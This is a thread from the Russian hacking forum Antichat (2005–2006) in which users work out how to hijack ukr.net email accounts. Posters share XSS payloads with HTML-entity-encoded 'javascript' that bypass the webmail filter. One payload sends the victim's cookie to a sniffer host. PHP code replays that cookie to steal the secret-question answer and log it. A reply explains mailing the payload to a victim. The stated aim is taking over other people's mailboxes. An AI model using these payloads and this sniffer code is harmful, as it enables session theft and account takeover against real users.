Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   ukr.net как? (https://forum.antichat.xyz/showthread.php?t=11261)

Grema 02.12.2005 00:19

ukr.net как?
 
www.ukr.net

Считываем ответ на секретный вопрос
Код:

<embed src=&#106&#97&#118&#97&#115&#99
но как? и куда его пихать, расжите плиз, очень надо! =)

Dronga 02.12.2005 04:20

ВЫКЛАДЫВАЙТЕ СРАЗУ ТЕСТОВЫЕ ЛОГИН/ПАРОЛЬ!

Регистрация нового ящика доступна только с территории Украины.

То что ты выложил - по всей видимости кусок Xss. Почему не до конца? Конкретнее без доступа к ящику сказать трудно, а работать на диал апе через украинские прокси мне не в прикол.

NeMiNeM 02.12.2005 16:35

Dronga
Логин - antichat@ukr.net
Пароль - abcde

Grema
Виложы до конца код!

Grema 02.12.2005 17:16

я его отсюда взял http://antichat.ru/txt/hmail/


полный код

<embed src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:this.wav>

FHT 02.12.2005 17:45

Цитата:

Сообщение от Grema
www.ukr.net

Считываем ответ на секретный вопрос
Код:

<embed src=&#106&#97&#118&#97&#115&#99
но как? и куда его пихать, расжите плиз, очень надо! =)

Дружище...Если ты его там взял то по ходу и прочитать должен был все...
Там все доходчиво описано...
Читай еще и еще и еще раз.
Пока не поймешь.

Dronga 03.12.2005 15:54

Взлом ящика на http://www.ukr.net/
 
Спасибо NeMiNeM за тестовые логин/пароль, надеюсь автор темы не забудет повысить ему репутацию.
Теперь по делу.
На исследования ушло ровным счетом 7 минут. Диагноз:
Фильтр чем-то напоминает тот, что чтоит на mail.ru (ранние версии). Пропускает закодированное javascript в левых тегах. Обходящая конструкция очень стандартна. Вот рабочий пример:
Код:

<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('ANTICHAT.RU');>
(javascript в ASCII)
В общем, полноценная активная xss в теле письма найдена.

Половина дела есть. Теперь смотрим что используется для авторизации. Сервер дал мне куки. В настройках я увидел отключенную опцию на запрет паралельных сессий, то есть на IP сервер по умолчанию не смотрит.

В дополнение ко всему мною были отмечены следущие особенности:
В настройках, в некоторых интересных местах не запрашивается пароль на сохранение изменений. Выводы делайте сами. На страничке Личная информация для antichat@ukr.net секретный вопрос и ответ на него не закрыты звездочками (!), то есть ящик элементарно "угоняется".

В общем, простор для творчества очень широкий.

Я бы тебе всё с удовольствием расписал от и до, но к сожалению в инете у меня осталось времени 8 минут. И те я трачу на тебя.. :cool:

Кстати, приведенный тобой код, тоже по идее должен работать (если только embed не фильтруется).

Актуально под IE6 и Opera 8.51 (Другие не пробовал)

muse 28.12.2005 15:21

ну а если нужно захватить канал на irc а чел в ящик незаглядует уже более года ??? что делать??

PinkPanther 05.01.2006 02:51

Захват ящика на ukr.net
 
Гы, у мну даж стать хде-то на винте статья пылится по данной теме....Дело это было еще в начале декабря, не знаю как сейчас, может уже и парсится.
Код:

<img src="http://privatesniff/1.gif"style="background:white url(&#106&#97&#118&#97&#115cript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)">
PHP код:

<? 
$query
=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0\r\n"
$header.="Referer: http://e.ukr.net\r\n";
$header.="Cookie: ".$query."\r\n";
$header.="Host: e.ukr.net\r\n\r\n";
$fp=fsockopen("e.ukr.net"80); 
fwrite($fp$header); 
$dt=""
while (!
feof($fp)) 
$dt.=fread($fp1024); 
$pass1=strpos($dt,'Password_Answer')+24
$pass2=strpos($dt,'" size="40"><br><br></td>'); 
$length_pass=$pass2-$pass1
$password=substr($dt,$pass1,$length_pass); 
$f1=Fopen("password.html","a"); 
fwrite($f1,"$password<br /><hr>"); 
fclose($f1); 
fclose($fp); 
?>

Так же, если при авторизации поставить галочку "Помнить пароль", то можно использовать и обічній сниффер, ибо нам в лог упадет пароль в чистом виде.

ZiM 06.01.2006 12:20

обясните плиз нешарящему, куда энто дело пихать?

PSalm69 06.01.2006 13:44

Цитата:

Сообщение от ZiM
обясните плиз нешарящему, куда энто дело пихать?

это посылаешь на мыло в письме жертве
Код:

<img src="http://privatesniff/1.gif"style="background:white url(&#106&#97&#118&#97&#115cript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)">
а код php сюда
_http:// privatesniff/s.php сюда


Время: 17:36